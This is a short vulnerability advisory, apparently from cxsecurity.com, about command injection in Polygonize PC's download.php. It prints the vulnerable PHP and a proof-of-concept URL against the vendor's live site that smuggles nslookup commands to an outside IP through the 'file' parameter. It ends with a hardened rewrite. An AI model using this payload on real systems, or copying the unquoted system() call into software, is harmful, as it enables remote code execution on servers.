Polygonize PC v1.1 RCE Vulnerability

2018.01.10
indoushka (DZ)
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

============================================================================================================================
| # Title : Polygonize PC v1.1 RCE Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 Français V.(Pro) |
| # Version : 1.1 |
| # Vendor : http://polygonize.net/ |
| # Dork : http://www.zone-h.org/mirror/id/30699471 |
============================================================================================================================

poc :

<?
/*************************************
 * Code to download JPGs, PDFs, etc
 * www.sometricks.com
 *************************************/
$file = $_GET['file'];
$file2 = "/var/www/cartoonize.net/web/tmp/".$_GET['file'];
system("/usr/bin/composite -gravity SouthEast watermark.png $file $file");
if(@is_array(getimagesize($file))){
    $image = true;
} else {
    $image = false;
}
//print_r(getimagesize($file2));
//exit();
if ($image==true) {
    header ("Content-type: octet/stream");
    header ("Content-disposition: attachment; filename=".$file.";");
    header("Content-Length: ".filesize($file));
    readfile($file);
} else
    echo "Wrong image type";
exit;
?>

http://polygonize.net//download.php?file=nslookup%20213.32.6.8|nslookup%20213.32.6.8%26nslookup%20213.32.6.8

Greetz :----------------------------------------------------------------------------------------
| jericho * Larry W. Cashdollar * shadow0075 * djroot.dz * Gjoko 'LiquidWorm' Krstic |
================================================================================================
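The `file` parameter above is spliced unquoted into `system()`, so shell metacharacters in it are executed by the server. The rewrite below is an added example (not the vendor's or the advisory author's code) that keeps the same download flow but constrains the input and quotes every command argument; it assumes images live under the `/var/www/cartoonize.net/web/tmp` directory named in the advisory and that `watermark.png` sits beside the script.

```php
<?php
// Hardened rewrite of the download.php flow from the advisory (added example,
// not the vendor's code). Assumptions: uploads live under $baseDir and
// watermark.png sits beside this script.
declare(strict_types=1);

$baseDir = '/var/www/cartoonize.net/web/tmp';   // directory named in the advisory's $file2
$name    = $_GET['file'] ?? '';

// 1. Accept only a bare image file name: no path separators, no shell metacharacters.
if (!is_string($name) || !preg_match('/^[A-Za-z0-9_\-]+\.(jpe?g|png|gif)$/i', $name)) {
    http_response_code(400);
    exit('Invalid file name');
}

// 2. Resolve the path and confirm it still lies inside $baseDir (guards symlinks).
$path = realpath($baseDir . '/' . $name);
if ($path === false || strncmp($path, $baseDir . '/', strlen($baseDir) + 1) !== 0) {
    http_response_code(404);
    exit('Not found');
}

// 3. Check that it is really an image before handing it to ImageMagick.
$info = @getimagesize($path);
if ($info === false) {
    http_response_code(415);
    exit('Wrong image type');
}

// 4. Run composite with every argument quoted; the regex already blocks
//    metacharacters, escapeshellarg() is the second line of defence.
$cmd = '/usr/bin/composite -gravity SouthEast '
     . escapeshellarg(__DIR__ . '/watermark.png') . ' '
     . escapeshellarg($path) . ' ' . escapeshellarg($path);
exec($cmd, $out, $rc);
if ($rc !== 0) {
    http_response_code(500);
    exit('Watermark failed');
}

// 5. Send the file; the name in Content-Disposition is the validated basename,
//    so it cannot carry header-injection characters either.
clearstatcache();
header('Content-Type: ' . $info['mime']);
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```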


Copyright 2018, cxsecurity.com
